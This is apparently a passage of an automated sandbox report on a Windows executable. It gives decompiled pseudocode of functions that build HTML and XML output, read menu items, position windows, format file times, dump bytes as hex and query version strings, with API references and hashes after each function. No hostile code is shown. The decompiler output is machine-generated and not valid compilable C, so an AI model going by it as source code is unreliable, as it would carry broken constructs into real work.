                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                    				void* _t57;
                                                                                                                                                                    				wchar_t* _t67;
                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                    				intOrPtr* _t97;
                                                                                                                                                                    				void* _t99;
                                                                                                                                                                    				void* _t101;
                                                                                                                                                                    
                                                                                                                                                                    				_t73 = __ebx;
                                                                                                                                                                    				_t74 = 0xd;
                                                                                                                                                                    				_push(9);
                                                                                                                                                                    				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                                                                                    				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                                                                                    				_t101 = _t99 + 0x18;
                                                                                                                                                                    				asm("movsw");
                                                                                                                                                                    				E00408857(__ebx, 0, _a4, L"<tr>");
                                                                                                                                                                    				_t94 = 0;
                                                                                                                                                                    				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
                                                                                                                                                                    					do {
                                                                                                                                                                    						_t55 =  *( *((intOrPtr*)(_t73 + 0x38)) + _t94 * 4);
                                                                                                                                                                    						_v8 = _t55;
                                                                                                                                                                    						_t57 =  &_v160;
                                                                                                                                                                    						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x48)) + 8)) == 0) {
                                                                                                                                                                    							_t57 =  &_v68;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t97 = _a8;
                                                                                                                                                                    						_v28 = _v28 | 0xffffffff;
                                                                                                                                                                    						_v24 = _v24 | 0xffffffff;
                                                                                                                                                                    						_v20 = _v20 | 0xffffffff;
                                                                                                                                                                    						_v16 = _v16 & 0x00000000;
                                                                                                                                                                    						_v12 = _t57;
                                                                                                                                                                    						 *((intOrPtr*)( *_t73 + 0x34))(5, _t94, _t97,  &_v28);
                                                                                                                                                                    						E0040DBA9(_v28,  &_v108);
                                                                                                                                                                    						E0040DBDA( *((intOrPtr*)( *_t97))(_v8,  *((intOrPtr*)(_t73 + 0x68))),  *(_t73 + 0x6c));
                                                                                                                                                                    						 *((intOrPtr*)( *_t73 + 0x54))( *(_t73 + 0x6c), _t97, _v8);
                                                                                                                                                                    						_t67 =  *(_t73 + 0x6c);
                                                                                                                                                                    						_t86 =  *_t67 & 0x0000ffff;
                                                                                                                                                                    						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                                                                                    							wcscat(_t67, L"&nbsp;");
                                                                                                                                                                    							_pop(0);
                                                                                                                                                                    						}
                                                                                                                                                                    						E0040DC79( &_v28,  *((intOrPtr*)(_t73 + 0x70)),  *(_t73 + 0x6c));
                                                                                                                                                                    						_push( *((intOrPtr*)(_t73 + 0x70)));
                                                                                                                                                                    						_push( &_v108);
                                                                                                                                                                    						_push(_v12);
                                                                                                                                                                    						_push(0x2000);
                                                                                                                                                                    						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                                                                    						L0040DFD6();
                                                                                                                                                                    						_t101 = _t101 + 0x1c;
                                                                                                                                                                    						E00408857(_t73, 0, _a4,  *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                                                                    						_t94 = _t94 + 1;
                                                                                                                                                                    					} while (_t94 <  *((intOrPtr*)(_t73 + 0x34)));
                                                                                                                                                                    				}
                                                                                                                                                                    				return E00408857(_t73, 0, _a4, L"\r\n");
                                                                                                                                                                    			}
























                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _snwprintfwcscat
                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                    • API String ID: 384018552-4153097237
                                                                                                                                                                    • Opcode ID: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
                                                                                                                                                                    • Instruction ID: 96aa4744b540e0de5a537674df1821739e57c2366694ca0e95279aca4d83ea93
                                                                                                                                                                    • Opcode Fuzzy Hash: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
                                                                                                                                                                    • Instruction Fuzzy Hash: 10318D31900208AFDF10AF55CC85E9A7B75FF04320F1040BAF855AB2E2DB35A945DB94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 42%
                                                                                                                                                                    			E00406E97(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                                                                                    				struct tagMENUITEMINFOW _v0;
                                                                                                                                                                    				int _t24;
                                                                                                                                                                    				wchar_t* _t30;
                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                    				int _t34;
                                                                                                                                                                    				int _t42;
                                                                                                                                                                    				signed int _t47;
                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                    
                                                                                                                                                                    				_t36 = __ecx;
                                                                                                                                                                    				_t48 = _t47 & 0xfffffff8;
                                                                                                                                                                    				E0040E340(0x203c, __ecx);
                                                                                                                                                                    				_t24 = GetMenuItemCount(_a8);
                                                                                                                                                                    				_t34 = _t24;
                                                                                                                                                                    				_t42 = 0;
                                                                                                                                                                    				if(_t34 <= 0) {
                                                                                                                                                                    					L13:
                                                                                                                                                                    					return _t24;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					goto L1;
                                                                                                                                                                    				}
                                                                                                                                                                    				do {
                                                                                                                                                                    					L1:
                                                                                                                                                                    					memset( &_a50, 0, 0x2000);
                                                                                                                                                                    					_t48 = _t48 + 0xc;
                                                                                                                                                                    					_a36 =  &_a48;
                                                                                                                                                                    					_v0.cbSize = 0x30;
                                                                                                                                                                    					_a4 = 0x36;
                                                                                                                                                                    					_a40 = 0x1000;
                                                                                                                                                                    					_a16 = 0;
                                                                                                                                                                    					_a48 = 0;
                                                                                                                                                                    					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                                                                                    					if(_t24 == 0) {
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a48 == 0) {
                                                                                                                                                                    						L10:
                                                                                                                                                                    						_t56 = _a20;
                                                                                                                                                                    						if(_a20 != 0) {
                                                                                                                                                                    							_push(0);
                                                                                                                                                                    							_push(_a20);
                                                                                                                                                                    							_push(_a4);
                                                                                                                                                                    							_t24 = E00406E97(_t36, _t56);
                                                                                                                                                                    							_t48 = _t48 + 0xc;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t30 = wcschr( &_a48, 9);
                                                                                                                                                                    					if(_t30 != 0) {
                                                                                                                                                                    						 *_t30 = 0;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t31 = _a16;
                                                                                                                                                                    					if(_a20 != 0) {
                                                                                                                                                                    						if(_a12 == 0) {
                                                                                                                                                                    							 *0x412c34 =  *0x412c34 + 1;
                                                                                                                                                                    							_t32 =  *0x412c34; // 0x0
                                                                                                                                                                    							_t31 = _t32 + 0x11558;
                                                                                                                                                                    							__eflags = _t32 + 0x11558;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                                                                                    							_t31 = _t17;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					_t24 = E00406E5E(_t31,  &_a48);
                                                                                                                                                                    					_pop(_t36);
                                                                                                                                                                    					goto L10;
                                                                                                                                                                    					L12:
                                                                                                                                                                    					_t42 = _t42 + 1;
                                                                                                                                                                    				} while (_t42 < _t34);
                                                                                                                                                                    				goto L13;
                                                                                                                                                                    			}












                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                                                                    • Opcode ID: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
                                                                                                                                                                    • Instruction ID: 1dbbb6522b92818e37563bbb7cb847876382a1d5db42aae0addc6953e8b82e52
                                                                                                                                                                    • Opcode Fuzzy Hash: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
                                                                                                                                                                    • Instruction Fuzzy Hash: 9021BF31105345ABC7209F61E84599FB7B8FB84754F000A3FF645A2280E7769A24CB9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                    			E004019D2(void* __ebx) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				int _v12;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				int _v24;
                                                                                                                                                                    				int _v28;
                                                                                                                                                                    				void* _t26;
                                                                                                                                                                    				int _t30;
                                                                                                                                                                    				void* _t33;
                                                                                                                                                                    				int _t36;
                                                                                                                                                                    				int _t37;
                                                                                                                                                                    				int _t40;
                                                                                                                                                                    				int _t49;
                                                                                                                                                                    
                                                                                                                                                                    				_t33 = __ebx;
                                                                                                                                                                    				if( *((intOrPtr*)(__ebx + 0x208)) == 0) {
                                                                                                                                                                    					return _t26;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					asm("movsd");
                                                                                                                                                                    					asm("movsd");
                                                                                                                                                                    					asm("movsd");
                                                                                                                                                                    					asm("movsd");
                                                                                                                                                                    					_v8 = GetSystemMetrics(0x4e);
                                                                                                                                                                    					_v12 = GetSystemMetrics(0x4f);
                                                                                                                                                                    					_t40 = GetSystemMetrics(0x4c);
                                                                                                                                                                    					_t30 = GetSystemMetrics(0x4d);
                                                                                                                                                                    					if(_v8 == 0 || _v12 == 0) {
                                                                                                                                                                    						_v8 = GetSystemMetrics(0);
                                                                                                                                                                    						_v12 = GetSystemMetrics(1);
                                                                                                                                                                    						_t40 = 0;
                                                                                                                                                                    						_t30 = 0;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_v8 = _v8 + _t40;
                                                                                                                                                                    						_v12 = _v12 + _t30;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t49 = _v20 - _v28;
                                                                                                                                                                    					if(_t49 > 0x14) {
                                                                                                                                                                    						_t37 = _v24;
                                                                                                                                                                    						_t36 = _v16 - _t37;
                                                                                                                                                                    						if(_t36 > 0x14 && _v20 > _t40 + 5) {
                                                                                                                                                                    							_t30 = _t30 + 0xfffffff6;
                                                                                                                                                                    							if(_t37 >= _t30) {
                                                                                                                                                                    								_t30 = _v28;
                                                                                                                                                                    								if(_t30 + 0x14 < _v8 && _t37 + 0x14 < _v12 &&  *((intOrPtr*)(_t33 + 0x250)) != 0) {
                                                                                                                                                                    									_t30 = SetWindowPos( *(_t33 + 0x208), 0, _t30, _t37, _t49, _t36, 0x204);
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					return _t30;
                                                                                                                                                                    				}
                                                                                                                                                                    			}

















                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemMetrics.USER32 ref: 004019FC
                                                                                                                                                                    • GetSystemMetrics.USER32 ref: 00401A03
                                                                                                                                                                    • GetSystemMetrics.USER32 ref: 00401A0A
                                                                                                                                                                    • GetSystemMetrics.USER32 ref: 00401A10
                                                                                                                                                                    • GetSystemMetrics.USER32 ref: 00401A27
                                                                                                                                                                    • GetSystemMetrics.USER32 ref: 00401A2E
                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000204,?,?,?,?,?,004019CF), ref: 00401A8B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MetricsSystem$Window
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1155976603-0
                                                                                                                                                                    • Opcode ID: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
                                                                                                                                                                    • Instruction ID: e852b1759cb622fbc777dcf2117f8c3e284781620e86bac7d74114db1399c759
                                                                                                                                                                    • Opcode Fuzzy Hash: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
                                                                                                                                                                    • Instruction Fuzzy Hash: 27215C72E4221AEBDF10DFA88D496AF7B71EF40320F1141BAD904BB2D1D674A981CE94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00405C17(FILETIME* __eax, wchar_t* _a4) {
                                                                                                                                                                    				struct _SYSTEMTIME _v24;
                                                                                                                                                                    				long _v280;
                                                                                                                                                                    				long _v536;
                                                                                                                                                                    				FILETIME* _t15;
                                                                                                                                                                    
                                                                                                                                                                    				_t15 = __eax;
                                                                                                                                                                    				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                                                                                    					if(FileTimeToSystemTime(_t15,  &_v24) == 0 || _v24 <= 0x3e8) {
                                                                                                                                                                    						goto L5;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						GetDateFormatW(0x400, 1,  &_v24, 0,  &_v280, 0x80);
                                                                                                                                                                    						GetTimeFormatW(0x400, 0,  &_v24, 0,  &_v536, 0x80);
                                                                                                                                                                    						wcscpy(_a4,  &_v280);
                                                                                                                                                                    						wcscat(_a4, " ");
                                                                                                                                                                    						wcscat(_a4,  &_v536);
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					L5:
                                                                                                                                                                    					wcscpy(_a4, 0x40f454);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _a4;
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00405C33
                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080), ref: 00405C5F
                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080), ref: 00405C74
                                                                                                                                                                    • wcscpy.MSVCRT ref: 00405C84
                                                                                                                                                                    • wcscat.MSVCRT ref: 00405C91
                                                                                                                                                                    • wcscat.MSVCRT ref: 00405CA0
                                                                                                                                                                    • wcscpy.MSVCRT ref: 00405CB2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1331804452-0
                                                                                                                                                                    • Opcode ID: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
                                                                                                                                                                    • Instruction ID: cbd8c252d2d2ef195a4c0e5b8e64ca40110f1bd057fda192b525793d095b5ed7
                                                                                                                                                                    • Opcode Fuzzy Hash: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
                                                                                                                                                                    • Instruction Fuzzy Hash: 57116072900209AFEB20AB90DD45EEF776CEB04314F104076FA05B6091E675AE49CAB9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                    			E00405D33(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                    				void _v514;
                                                                                                                                                                    				long _v516;
                                                                                                                                                                    				wchar_t* _t34;
                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                    				void* _t36;
                                                                                                                                                                    				void* _t37;
                                                                                                                                                                    
                                                                                                                                                                    				_t34 = __edi;
                                                                                                                                                                    				_v516 = _v516 & 0x00000000;
                                                                                                                                                                    				memset( &_v514, 0, 0x1fc);
                                                                                                                                                                    				 *__edi =  *__edi & 0x00000000;
                                                                                                                                                                    				_t37 = _t36 + 0xc;
                                                                                                                                                                    				_t35 = 0;
                                                                                                                                                                    				do {
                                                                                                                                                                    					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                                                                    					_push(L"%2.2X");
                                                                                                                                                                    					_push(0xff);
                                                                                                                                                                    					_push( &_v516);
                                                                                                                                                                    					L0040DFD6();
                                                                                                                                                                    					_t37 = _t37 + 0x10;
                                                                                                                                                                    					if(_t35 > 0) {
                                                                                                                                                                    						wcscat(_t34, " ");
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8 > 0) {
                                                                                                                                                                    						asm("cdq");
                                                                                                                                                                    						if(_t35 % _a8 == 0) {
                                                                                                                                                                    							wcscat(_t34, L"  ");
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					wcscat(_t34,  &_v516);
                                                                                                                                                                    					_t35 = _t35 + 1;
                                                                                                                                                                    				} while (_t35 < 0x80);
                                                                                                                                                                    				return _t34;
                                                                                                                                                                    			}










                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                                    • Opcode ID: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
                                                                                                                                                                    • Instruction ID: cee391cc34d681d13bec3c3f8d39c8b6c523e2a4e61045ff621ae80f21b9d711
                                                                                                                                                                    • Opcode Fuzzy Hash: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
                                                                                                                                                                    • Instruction Fuzzy Hash: 86012873E403196AE73067519C4ABBB33A8EF44714F10807BFC15F51C2EB7C99498A88
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                    			E004093B3(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                    				void _v514;
                                                                                                                                                                    				char _v516;
                                                                                                                                                                    				void _v1026;
                                                                                                                                                                    				char _v1028;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr* _t16;
                                                                                                                                                                    				void* _t19;
                                                                                                                                                                    				intOrPtr* _t29;
                                                                                                                                                                    				char* _t31;
                                                                                                                                                                    
                                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                                    				_t29 = __ecx;
                                                                                                                                                                    				_v516 = 0;
                                                                                                                                                                    				memset( &_v514, 0, 0x1fc);
                                                                                                                                                                    				_v1028 = 0;
                                                                                                                                                                    				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                                    				_t16 = _t29;
                                                                                                                                                                    				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                                                                                                    					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                                                                                                    				}
                                                                                                                                                                    				E00408857(_t16, _t27);
                                                                                                                                                                    				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                                                                                                    				_t31 =  &_v516;
                                                                                                                                                                    				E004086F5(_t31, _t19);
                                                                                                                                                                    				_push(_t31);
                                                                                                                                                                    				_push(L"<%s>\r\n");
                                                                                                                                                                    				_push(0xff);
                                                                                                                                                                    				_push( &_v1028);
                                                                                                                                                                    				L0040DFD6();
                                                                                                                                                                    				return E00408857(_t29, _t29, _a4,  &_v1028);
                                                                                                                                                                    			}













                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • <%s>, xrefs: 00409426
                                                                                                                                                                    • <?xml version="1.0" ?>, xrefs: 004093FC
                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409403
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                                                                    • Opcode ID: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
                                                                                                                                                                    • Instruction ID: 5b2b9264402656275e8c2dd0f1d17c7e9a998e95cf6bd8efe94fc2853a0f1184
                                                                                                                                                                    • Opcode Fuzzy Hash: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
                                                                                                                                                                    • Instruction Fuzzy Hash: 57019BB2A001197AD720BA59CD41EAA766CEF44348F0040BBB60DF3192DB789E4586A9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040DDA7(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				int _v12;
                                                                                                                                                                    				short _v524;
                                                                                                                                                                    				char _v1036;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    
                                                                                                                                                                    				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                                                                                                    				wcscat( &_v524, _a8);
                                                                                                                                                                    				wcscat( &_v524, "\\");
                                                                                                                                                                    				wcscat( &_v524, _a12);
                                                                                                                                                                    				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t34 =  &_v1036;
                                                                                                                                                                    				E004055FF(0xff,  &_v1036, _v8);
                                                                                                                                                                    				E004056C9(_t34, __esi);
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DDBC
                                                                                                                                                                    • wcscat.MSVCRT ref: 0040DDCB
                                                                                                                                                                    • wcscat.MSVCRT ref: 0040DDDC
                                                                                                                                                                    • wcscat.MSVCRT ref: 0040DDEB
                                                                                                                                                                    • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040DE05
                                                                                                                                                                      • Part of subcall function 004055FF: wcslen.MSVCRT ref: 00405606
                                                                                                                                                                      • Part of subcall function 004055FF: memcpy.MSVCRT ref: 0040561C
                                                                                                                                                                      • Part of subcall function 004056C9: lstrcpyW.KERNEL32 ref: 004056DE
                                                                                                                                                                      • Part of subcall function 004056C9: lstrlenW.KERNEL32(?), ref: 004056E5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                                    • API String ID: 393120378-2245444037
                                                                                                                                                                    • Opcode ID: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
                                                                                                                                                                    • Instruction ID: 65d82e6da75efbf52a81394e95eb84ccec4353c565c4c92e21fc1f2e9f7c11b1
                                                                                                                                                                    • Opcode Fuzzy Hash: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
                                                                                                                                                                    • Instruction Fuzzy Hash: B701717290020DAACF10EAE1CC45EDF777D9B04304F0005B7B555F2092EA78EA999B58
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                                    • Opcode ID: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
                                                                                                                                                                    • Instruction ID: 89c1d54e0424cdf8955af57a35c4f81b258c2803f9b3bbee4052a97a94dd298f
                                                                                                                                                                    • Opcode Fuzzy Hash: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
                                                                                                                                                                    • Instruction Fuzzy Hash: 61E08672B8830131F93452452E03B2A2190EA94B18F724C7BF54BF05D2E6FD9874650F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                    			E0040CBD8(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                                                                                                    				void* _v0;
                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				char _v20;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                    				void* _t59;
                                                                                                                                                                    				void* _t69;
                                                                                                                                                                    				void* _t72;
